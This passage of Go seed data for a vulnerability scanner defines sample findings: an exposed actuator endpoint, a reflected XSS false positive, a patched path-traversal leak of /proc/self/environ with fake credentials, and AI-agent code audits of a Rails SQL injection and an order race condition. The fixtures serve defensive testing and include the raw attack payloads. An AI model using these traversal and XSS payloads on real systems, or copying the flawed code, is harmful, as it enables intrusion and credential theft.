			Request:          "GET /actuator/env HTTP/1.1\r\nHost: api.shop.local\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: application/vnd.spring-boot.actuator.v3+json\r\n\r\n{\"activeProfiles\":[\"production\"],\"propertySources\":[{\"name\":\"systemEnvironment\",\"properties\":{\"DATABASE_URL\":{\"value\":\"postgresql://admin:***@db.internal:5432/shopdb\"},\"REDIS_URL\":{\"value\":\"redis://cache.internal:6379\"}}}]}",
			FindingHash:      hashStr([]byte("nuclei-actuator-api.shop.local")),
			FoundAt:          now.Add(-3*time.Hour - 48*time.Minute),
			CreatedAt:        now.Add(-3*time.Hour - 48*time.Minute),
		},

		// =====================================================================
		// Findings with non-default lifecycle statuses
		// =====================================================================

		// False positive — marked by user
		{
			HTTPRecordUUIDs:  []string{findRec("/search?q=test")},
			ScanUUID:         "scan-0001-aaaa-bbbb-cccc-ddddeeee0001",
			URL:              "https://example.com/search?q=%3Csvg+onload=alert()%3E",
			Hostname:         "example.com",
			ModuleID:         "xss-reflected-param",
			ModuleName:       "xss",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects reflected cross-site scripting via parameter injection",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "Reflected XSS via 'q' parameter — SVG onload payload echoed but CSP blocks execution",
			Severity:         "high",
			Confidence:       "firm",
			Tags:             []string{"xss", "reflected", "csp-blocked"},
			Status:           "false_positive",
			Remediation:      "Not applicable — CSP header Content-Security-Policy: script-src 'self' effectively blocks this vector",
			MatchedAt:        []string{"https://example.com/search?q=<svg+onload=alert()>"},
			ExtractedResults: []string{"<svg onload=alert()>"},
			Request:          "GET /search?q=%3Csvg+onload%3Dalert()%3E HTTP/1.1\r\nHost: example.com\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Security-Policy: script-src 'self'\r\n\r\n<!DOCTYPE html>\n<html><body><p>You searched for: <svg onload=alert()></p></body></html>",
			FindingHash:      hashStr([]byte("xss-fp-example.com-/search-q-svg")),
			FoundAt:          now.Add(-80 * time.Minute),
			CreatedAt:        now.Add(-80 * time.Minute),
		},
		// Fixed finding
		{
			HTTPRecordUUIDs:  []string{findRec("/admin/logs")},
			ScanUUID:         "scan-0001-aaaa-bbbb-cccc-ddddeeee0001",
			URL:              "https://admin.example.com:8443/admin/logs?file=../../../proc/self/environ",
			Hostname:         "admin.example.com",
			ModuleID:         "lfi-path-traversal",
			ModuleName:       "lfi",
			ModuleType:       database.ModuleTypeActive,
			ModuleShort:      "Detects local file inclusion via path traversal",
			FindingSource:    database.FindingSourceDynamicAssessment,
			Description:      "LFI via 'file' parameter — /proc/self/environ leaked environment variables including database credentials (now patched with path sanitization)",
			Severity:         "critical",
			Confidence:       "certain",
			Tags:             []string{"lfi", "path-traversal", "env-leak"},
			Status:           "fixed",
			Remediation:      "Fixed in commit a1b2c3d: added filepath.Clean() and basepath check to logs handler. Verified fix prevents traversal outside /var/log/",
			CWEID:            "CWE-22",
			CVSSScore:        9.1,
			MatchedAt:        []string{"https://admin.example.com:8443/admin/logs?file=../../../proc/self/environ"},
			ExtractedResults: []string{"DATABASE_URL=postgresql://admin:p0stgr3s_pr0d!@db.internal:5432/shopdb"},
			Request:          "GET /admin/logs?file=../../../proc/self/environ HTTP/1.1\r\nHost: admin.example.com:8443\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\n",
			Response:         "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\nDATABASE_URL=postgresql://admin:p0stgr3s_pr0d!@db.internal:5432/shopdb\x00JWT_SECRET=sup3r-s3cret-k3y\x00PATH=/usr/local/bin:/usr/bin",
			FindingHash:      hashStr([]byte("lfi-fixed-admin.example.com-/admin/logs-environ")),
			FoundAt:          now.Add(-6 * time.Hour),
			CreatedAt:        now.Add(-6 * time.Hour),
		},

		// =====================================================================
		// Agent source analysis finding — code audit without HTTP interaction
		// =====================================================================
		{
			HTTPRecordUUIDs:  []string{findRec("/post/hello-world")},
			AgenticScanUUID:  "agent-0001-aaaa-bbbb-cccc-ddddeeee0001",
			URL:              "https://blog.test/post/:slug/comment",
			Hostname:         "blog.test",
			ModuleID:         "agent-code-audit-sqli",
			ModuleName:       "Agent Code Audit",
			ModuleType:       database.ModuleTypeAgent,
			ModuleShort:      "AI agent identified vulnerability through source code analysis",
			FindingSource:    database.FindingSourceAgent,
			Description:      "SQL injection in comment submission — Rails controller uses string interpolation in ActiveRecord where clause. User-controlled 'author' field concatenated into SQL without parameterization",
			Severity:         "high",
			Confidence:       "firm",
			Tags:             []string{"agent", "code-audit", "sqli", "ruby", "rails", "cwe-89"},
			Status:           "triaged",
			Remediation:      "Replace Comment.where(\"author = '#{params[:author]}'\") with Comment.where(author: params[:author]) to use parameterized query",
			CWEID:            "CWE-89",
			CVSSScore:        8.6,
			SourceFile:       "/opt/repos/blog-engine/app/controllers/comments_controller.rb:18",
			MatchedAt:        []string{"/opt/repos/blog-engine/app/controllers/comments_controller.rb:18"},
			ExtractedResults: []string{"Comment.where(\"author = '#{params[:author]}'\")", "sink: ActiveRecord.where(string)", "parameter: author"},
			AdditionalEvidence: []string{
				"Source: app/controllers/comments_controller.rb:15-25\n---------\ndef create\n  # BUG: string interpolation in SQL\n  existing = Comment.where(\"author = '#{params[:author]}' AND post_id = #{@post.id}\")\n  if existing.count >= 3\n    render json: { error: 'Too many comments' }, status: 429\n    return\n  end\n  @comment = Comment.new(comment_params)\n  @comment.post = @post\n  @comment.save\nend",
				"Agent reasoning: The where() call uses Ruby string interpolation (#{}) instead of parameterized placeholders (?). Both author (user input) and post_id (from URL) are interpolated. While post_id is an integer from the route, author is a free-text field accepting arbitrary input including SQL metacharacters.",
			},
			FindingHash: hashStr([]byte("agent-code-audit-sqli-blog-comments_controller.rb-18")),
			FoundAt:     now.Add(-2*time.Hour - 50*time.Minute),
			CreatedAt:   now.Add(-2*time.Hour - 50*time.Minute),
		},
		// Agent source analysis: Race condition in order processing
		{
			HTTPRecordUUIDs:  []string{findRec("/api/v1/orders")},
			AgenticScanUUID:  "agent-0003-aaaa-bbbb-cccc-ddddeeee0003",
			URL:              "https://api.shop.local/api/v1/orders",
			Hostname:         "api.shop.local",
			ModuleID:         "agent-code-audit-race",
			ModuleName:       "Agent Code Audit",
			ModuleType:       database.ModuleTypeAgent,
			ModuleShort:      "AI agent identified race condition through source code analysis",
			FindingSource:    database.FindingSourceAgent,
			Description:      "Time-of-check-to-time-of-use (TOCTOU) race condition in order placement — balance check and deduction are not atomic, allowing concurrent requests to overdraw account balance",
			Severity:         "medium",
			Confidence:       "firm",
			Tags:             []string{"agent", "code-audit", "race-condition", "toctou", "python", "cwe-367"},
			Status:           "triaged",
			Remediation:      "Use SELECT ... FOR UPDATE or database-level advisory lock to make the balance check and deduction atomic within a single transaction",
			CWEID:            "CWE-367",
			CVSSScore:        5.9,
			SourceFile:       "/opt/repos/shop-api/app/routes/orders.py:45",
			MatchedAt:        []string{"/opt/repos/shop-api/app/routes/orders.py:45"},
			ExtractedResults: []string{"check: user.balance >= order.total", "deduct: user.balance -= order.total", "gap: 2 separate queries without lock"},
			AdditionalEvidence: []string{
				"Source: app/routes/orders.py:40-55\n---------\n@router.post(\"/api/v1/orders\")\nasync def create_order(order: OrderSchema, user=Depends(get_user)):\n    # Check balance (TOCTOU: not atomic with deduction)\n    user = await db.fetch_one(\"SELECT * FROM users WHERE id = ?\", [user.id])\n    if user.balance < order.total:\n        raise HTTPException(400, \"Insufficient balance\")\n    # Deduct balance\n    await db.execute(\n        \"UPDATE users SET balance = balance - ? WHERE id = ?\",\n        [order.total, user.id]\n    )\n    # Create order\n    await db.execute(\"INSERT INTO orders ...\")\n    return {\"status\": \"created\"}",
			},
			FindingHash: hashStr([]byte("agent-code-audit-race-shop-api-orders.py-45")),
			FoundAt:     now.Add(-1*time.Hour - 5*time.Minute),
			CreatedAt:   now.Add(-1*time.Hour - 5*time.Minute),
		},
	}

	return findings
}

// moduleClassification maps module IDs to CWE / CVSS / remediation so findings
// can be enriched centrally rather than repeating the info in every seed row.
type moduleClassification struct {
	CWE         string
	CVSS        float64
	Remediation string
}

var findingClassification = map[string]moduleClassification{
	"xss-reflected-param":      {"CWE-79", 6.1, "Context-aware encode user input before rendering into HTML, JS, URL, or CSS sinks. Prefer an auto-escaping template engine."},
	"sqli-union-based":         {"CWE-89", 9.8, "Use parameterized queries or prepared statements. Never build SQL via string concatenation on user input."},
	"sqli-error-based":         {"CWE-89", 8.1, "Use parameterized queries and disable verbose database errors in production responses."},
	"lfi-path-traversal":       {"CWE-22", 8.6, "Canonicalize paths and restrict file access to an allowlist. Reject inputs containing '..' or absolute paths."},
	"ssti-expression-eval":     {"CWE-94", 8.5, "Use sandboxed template engines; never pass untrusted input into templating syntax."},
	"crlf-header-injection":    {"CWE-93", 5.4, "Strip CR/LF characters from any user input used in HTTP response headers or cookies."},
	"open-redirect":            {"CWE-601", 4.3, "Validate redirect destinations against a domain allowlist or use a mapping table of safe targets."},
	"info-server-version":      {"CWE-200", 3.1, "Suppress version banners (Server, X-Powered-By) and upgrade to supported server versions."},
	"info-missing-headers":     {"CWE-693", 0.0, "Add X-Content-Type-Options, X-Frame-Options, and Content-Security-Policy response headers."},
	"info-sensitive-data":      {"CWE-200", 5.3, "Remove sensitive fields (API keys, tokens, secrets) from API response schemas."},
	"backslash-transformation": {"CWE-707", 0.0, "Escape sequence interpretation is a behavioural signal — manually confirm if it points to injection."},
	"suspect-transform":        {"CWE-707", 0.0, "Server-side evaluation of arithmetic expressions is a behavioural signal — confirm with targeted payloads."},
	"smart-behavior-detection": {"CWE-707", 0.0, "Differential timing/response is a behavioural signal — follow up with targeted injection probes."},
}

// enrichFindings hydrates denormalized and classification fields based on the
// referenced HTTP record and the finding's module ID.
func enrichFindings(findings []*database.Finding, records []*database.HTTPRecord) {
	byUUID := make(map[string]*database.HTTPRecord, len(records))
	for _, r := range records {
		byUUID[r.UUID] = r
	}
	for _, f := range findings {
		if len(f.HTTPRecordUUIDs) > 0 {
			if r, ok := byUUID[f.HTTPRecordUUIDs[0]]; ok {
				if f.URL == "" {
					f.URL = r.URL
				}
				if f.Hostname == "" {
					f.Hostname = r.Hostname
				}
				if f.ScanUUID == "" {
					f.ScanUUID = r.ScanUUID
				}
			}
		}
		if c, ok := findingClassification[f.ModuleID]; ok {
			if f.CWEID == "" {
				f.CWEID = c.CWE
			}
			if f.CVSSScore == 0 {
				f.CVSSScore = c.CVSS
			}
			if f.Remediation == "" {
				f.Remediation = c.Remediation
			}
		}
		if f.Status == "" {
			f.Status = database.StatusTriaged
		}
	}
	// Exercise the lifecycle: agent-sourced findings land as draft awaiting
	// triage; the missing-headers passive finding is accepted risk and one
	// behavioural suspect was triaged as a false positive.
	for _, f := range findings {
		switch f.ModuleID {
		case "info-missing-headers":
			f.Status = database.StatusAcceptedRisk
		case "smart-behavior-detection":
			f.Status = database.StatusFalsePositive
		case "sqli-union-based":
			f.Status = database.StatusTriaged
		}
		if f.FindingSource == database.FindingSourceAgent || f.FindingSource == database.FindingSourceAudit {
			f.Status = database.StatusDraft
		}
	}
}
